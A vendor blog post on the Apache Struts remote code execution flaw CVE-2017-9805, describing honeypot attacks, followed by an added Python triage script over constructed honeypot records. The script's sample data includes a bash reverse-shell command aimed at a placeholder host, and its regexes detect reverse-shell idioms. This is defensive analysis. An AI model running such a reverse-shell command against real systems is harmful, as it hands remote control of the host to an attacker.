McAfee Demos Ease of Exploiting Recent Apache Struts Vulnerability


This post was written by Brook Schoenfield and the Advanced Threat Research Team.

A series of exploitable conditions has been uncovered in Apache Struts. One of these, CVE-2017-9805, allows unauthenticated execution of attacker-supplied code (remote code execution). The issue has already been weaponized in exploitation frameworks such as Metasploit, and exploitation has been seen "in the wild"; that is, attackers are actively attempting to take advantage of the flaw.

Apache Struts is a popular open-source component that is used in numerous websites across the Internet, which makes a remote code execution vulnerability very concerning. Speculation is widespread about this issue’s exploitation.

CVE-2017-9805 describes a vulnerability in Apache Struts 2.5.12 that could be exploited by malware or by any other attack vector designed to take advantage of the flaw. To our knowledge, Apache Struts 2.5.12 is not used in McAfee enterprise products as delivered by McAfee.

To demonstrate how easy it is to exploit the vulnerability, we created a little demo in which we take ownership of a vulnerable system. You can watch the video here.

To get an indication of the volume of attacks, the Advanced Threat Research (ATR) team set up a "honeypot" system to attract attack attempts. After less than two hours online, the ATR honeypot recorded two attacks. One attacker attempted to run the Windows command interpreter (cmd.exe) on our Linux box; the other attempted to open a reverse shell back to the attacker's own machine. Had that succeeded, the attacker could have gained full control of our system. Of course, our honeypot setup does not allow an actual compromise.
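The two attempts above differ in a way a defender wants to surface quickly: a Windows command sent to a Linux host signals an untargeted scanner, while a reverse-shell attempt signals an attacker after interactive control. The following triage script is an added example, not code from the original post or from McAfee; it runs over constructed honeypot records in a made-up one-line format (timestamp, source address, method, path, and the OS command the exploit attempt tried to run) and sorts each request into one of those categories.

```python
import re
from dataclasses import dataclass

# Constructed honeypot records (not real captures): one request per line, with
# the command the exploit attempt tried to execute on the Linux honeypot.
SAMPLE_CAPTURES = """\
2017-09-07T14:02:11Z 198.51.100.23 POST /struts2-rest-showcase/orders/3 cmd="cmd.exe /c whoami"
2017-09-07T15:40:52Z 203.0.113.77 POST /struts2-rest-showcase/orders/3 cmd="bash -i >& /dev/tcp/203.0.113.77/4444 0>&1"
2017-09-07T15:41:03Z 192.0.2.9 GET /struts2-rest-showcase/orders/3 cmd=""
"""

HONEYPOT_OS = "linux"  # the honeypot in the post was a Linux box

# Windows-only interpreters: on a Linux host these can only come from an
# untargeted, automated exploit kit that did not fingerprint the victim.
WINDOWS_ONLY = re.compile(r"\b(cmd\.exe|powershell(\.exe)?)\b", re.I)
# Common reverse-shell idioms: the attacker wants an interactive channel back.
REVERSE_SHELL = re.compile(r"(/dev/tcp/|\bn?cat?\b[^\n]*\s-e\s|\bbash -i\b)")
# Constructed record layout: ts src method path cmd="..."
LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<path>\S+) cmd="(?P<cmd>.*)"$')


@dataclass
class Finding:
    ts: str
    src: str
    verdict: str
    cmd: str


def classify(cmd: str, host_os: str = HONEYPOT_OS) -> str:
    """Label a captured command by what the attacker was trying to achieve."""
    if not cmd:
        return "benign"
    if REVERSE_SHELL.search(cmd):
        return "reverse-shell"  # interactive control of the host was the goal
    if host_os == "linux" and WINDOWS_ONLY.search(cmd):
        return "wrong-os-command"  # untargeted scanner, low chance of success
    return "command-execution"


def triage(capture_text: str) -> list[Finding]:
    """Parse the records and return every non-benign attempt in order seen."""
    findings = []
    for line in capture_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # malformed record, skip rather than guess
        verdict = classify(m["cmd"])
        if verdict != "benign":
            findings.append(Finding(m["ts"], m["src"], verdict, m["cmd"]))
    return findings
```

Run against the constructed records, the script reports the first request as "wrong-os-command" and the second as "reverse-shell", matching the two attempts described in the post.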

McAfee handles reported vulnerabilities in accordance with our product security practices. McAfee adheres to international product incident practices, including CVSS Version 3.0 calculation and CVE assignment.

McAfee actively encourages customer engagement and welcomes specific requests for clarification about our software security process. There are some things we do not disclose, such as lists of vulnerabilities found through internal investigations or automated testing tools.

For external communications, we publish a security bulletin to all customers of an affected McAfee product as soon as McAfee’s security vulnerability team has confirmed that the vulnerability is critical, and after McAfee has determined appropriate mitigation for the vulnerability. (“Critical” means greater than or equal to CVSS 8.5.) The bulletin may address mitigations, workarounds, and updates. Please see McAfee’s Product Security Bulletins for more information.
